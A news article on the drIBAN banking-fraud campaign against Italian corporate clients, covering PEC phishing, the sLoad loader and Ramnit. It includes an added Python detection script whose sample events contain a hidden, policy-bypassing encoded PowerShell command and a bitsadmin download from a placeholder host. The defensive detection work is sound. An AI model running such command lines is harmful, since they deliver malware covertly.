Posted on May 6, 2023 at 6:31 AM
Hackers use a new web-inject toolkit to target Italian corporate banking clients
Hackers have been targeting Italian corporate banking clients in an ongoing financial fraud campaign that has relied on a new web-inject toolkit, known as drIBAN, since at least 2019. The toolkit's focus on corporate banking makes the campaign a significant threat to the financial industry.
Hackers target Italian corporate banking clients in an ongoing financial fraud campaign
According to Cleafy cybersecurity researchers Federico Valentini and Alessandro Strino, the main objective of the campaign is to infect Windows workstations inside corporate environments and then tamper with legitimate bank transfers initiated by the victims, changing the beneficiary so that the funds are routed to illegitimate bank accounts.
“The main goal of drIBAN fraud operations is to infect Windows workstations inside corporate environments trying to alter legitimate banking transfers performed by the victims by changing the beneficiary and transferring money to an illegitimate bank account,” the cybersecurity researchers said.
The Italian cybersecurity company also said that the accounts receiving the diverted funds are owned by the hackers or by their affiliates, who are tasked with laundering the stolen money.
The hackers rely on web injects, a time-tested technique in which banking malware performs a man-in-the-browser attack: it injects custom scripts into the banking web pages rendered on the victim's machine, which lets it read and modify the traffic exchanged between the browser and the bank's server from inside the victim's authenticated session.
The fraudulent transactions are carried out through an Automated Transfer System (ATS), a class of web inject that automates the manipulation of the transfer. Because the unauthorized wire transfer is initiated from the victim's own computer and session, it can slip past the anti-fraud controls deployed by financial institutions such as banks.
The operators behind the drIBAN web-inject toolkit have become more sophisticated over the years, refining both their detection evasion and their social engineering. They have also established a persistent foothold among their pool of victims: their attacks usually last for long periods, with corporate banking customers as the primary target.
The hacking campaign has been ongoing for years
According to a report published by Cleafy, the operation started as a classic "banking trojan" campaign and in 2021 evolved into an advanced persistent threat. Other indicators show that this activity cluster overlaps with a campaign conducted in 2018.
The 2018 campaign was attributed to a threat actor known as TA554, tracked by Proofpoint researchers, whose data showed it targeting users based in Canada, Italy, and the United Kingdom.
The attack chain begins with a certified email, known in Italy as a PEC (Posta Elettronica Certificata) email. Because PEC messages carry a legal standing comparable to registered mail, the threat actors use them to lull victims into a false sense of security.
The phishing emails carry an executable file that acts as a downloader for the malware known as sLoad, or Starslord loader. sLoad is a PowerShell-based loader capable of collecting data from the victim's machine.
sLoad operates as a reconnaissance tool that gathers and exfiltrates information from the compromised host so that the operators can assess the target before deploying a more significant payload such as Ramnit. That payload is deployed only if the target is classified as profitable, that is, if the hackers expect to make a financial gain from it.
Cleafy further said that this enrichment phase can continue for days or weeks, depending on the number of infected machines. The additional data stolen from victims is exfiltrated to the operators, making the botnet more robust and the fraud operation more consistent.
The sLoad PowerShell loader also uses living-off-the-land (LotL) techniques, abusing legitimate Windows tools such as PowerShell and BITSAdmin as part of its evasion mechanisms: these binaries are signed, present on every Windows host and routinely used by administrators, so their activity blends in with normal system operation.
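The LotL pattern above is detectable from process-creation telemetry even though every binary involved is legitimate, because the combination of flags and the parent/child relationship are not what normal administration looks like. The following is an added example, not drIBAN or sLoad code and not material from the Cleafy report: it runs three rules over a handful of constructed, Sysmon-style process-creation records (the field names pid, ppid, image, parent_image and cmdline are an assumption about the log source) and then correlates them into the full chain of an evasive PowerShell process spawning a bitsadmin.exe download. The encoded-command blob and the URL in the sample data are placeholders.

```python
# Added example (not drIBAN/sLoad code or Cleafy material): a minimal detection
# for the living-off-the-land chain described above, PowerShell launched with
# evasion flags that then drives bitsadmin.exe to download a payload.
# The event records below are constructed by hand in a Sysmon Event ID 1-like
# shape; the field names (pid, ppid, image, parent_image, cmdline) are an
# assumption about the log source, not a real schema.
import re

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
BITS_IMAGE = r"C:\Windows\System32\bitsadmin.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample events. The -enc blob is a placeholder (UTF-16LE "ABC"),
# not a real payload; the URL uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 812, "image": EXPLORER,
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"pid": 5120, "ppid": 4100, "image": PS_IMAGE, "parent_image": EXPLORER,
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc QQBCAEMA"},
    {"pid": 5188, "ppid": 5120, "image": BITS_IMAGE, "parent_image": PS_IMAGE,
     "cmdline": r"bitsadmin.exe /transfer upd /download /priority normal "
                r"https://cdn.example.invalid/u.ps1 C:\Users\Public\u.ps1"},
    # Benign: BITS queue being listed by a service, no URL, no /transfer.
    {"pid": 6000, "ppid": 900, "image": BITS_IMAGE,
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "bitsadmin.exe /list /allusers"},
    # Benign: interactive PowerShell with no evasion flags.
    {"pid": 6200, "ppid": 4100, "image": PS_IMAGE, "parent_image": EXPLORER,
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
]

POWERSHELL_RE = re.compile(r"powershell(?:_ise)?\.exe$", re.I)
BITSADMIN_RE = re.compile(r"bitsadmin\.exe$", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
# Flags loaders combine to hide the console, skip profiles/policy and run encoded code.
EVASIVE_PS_FLAGS_RE = re.compile(
    r"(?:^|\s)-(?:enc(?:odedcommand)?|w(?:indowstyle)?\s+hidden|nop(?:rofile)?"
    r"|ep\s+bypass|executionpolicy\s+bypass)\b",
    re.I,
)


def event_findings(ev, by_pid):
    """Return the names of the rules that fire for one process-creation event."""
    findings = []
    image, cmd = ev["image"], ev["cmdline"]
    # Rule 1: bitsadmin used as a downloader (a /transfer job with a remote URL).
    if BITSADMIN_RE.search(image) and re.search(r"/transfer\b", cmd, re.I) and URL_RE.search(cmd):
        findings.append("bitsadmin_download")
    # Rule 2: PowerShell started with two or more evasion flags.
    if POWERSHELL_RE.search(image) and len(EVASIVE_PS_FLAGS_RE.findall(cmd)) >= 2:
        findings.append("powershell_evasive_flags")
    # Rule 3: parent/child relationship, PowerShell spawning bitsadmin.
    parent = by_pid.get(ev["ppid"])
    if BITSADMIN_RE.search(image) and parent is not None and POWERSHELL_RE.search(parent["image"]):
        findings.append("powershell_spawns_bitsadmin")
    return findings


def detect_lotl(events):
    """Map pid -> list of findings for every event that triggered at least one rule."""
    by_pid = {ev["pid"]: ev for ev in events}
    out = {}
    for ev in events:
        hits = event_findings(ev, by_pid)
        if hits:
            out[ev["pid"]] = hits
    return out


def find_chains(events):
    """Return (powershell_pid, bitsadmin_pid) pairs where an evasive PowerShell
    process spawned a bitsadmin download: the complete sLoad-style chain, which
    deserves a higher severity than any single rule alone."""
    hits = detect_lotl(events)
    by_pid = {ev["pid"]: ev for ev in events}
    chains = []
    for pid, names in hits.items():
        if "bitsadmin_download" in names and "powershell_spawns_bitsadmin" in names:
            ppid = by_pid[pid]["ppid"]
            if "powershell_evasive_flags" in hits.get(ppid, []):
                chains.append((ppid, pid))
    return chains


if __name__ == "__main__":
    for pid, names in detect_lotl(SAMPLE_EVENTS).items():
        print(pid, names)
    print("chains:", find_chains(SAMPLE_EVENTS))
```

Each rule on its own produces noise in a real estate (administrators do use bitsadmin and hidden PowerShell windows), which is why the correlation in find_chains, an evasive PowerShell parent plus a bitsadmin download child, is the finding worth paging on; the individual rule hits are better kept as lower-severity context for triage.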
The malware can also check the compromised workstation against a predetermined list of corporate banks to determine whether it belongs to one of the intended targets. Only if the institution is on that list does the infection proceed.
The researchers further said that bots which pass these steps are selected by the botnet operators as "new candidates" for banking fraud operations. Once a bot has been singled out, the Ramnit banking trojan is deployed and installed on the victim's device.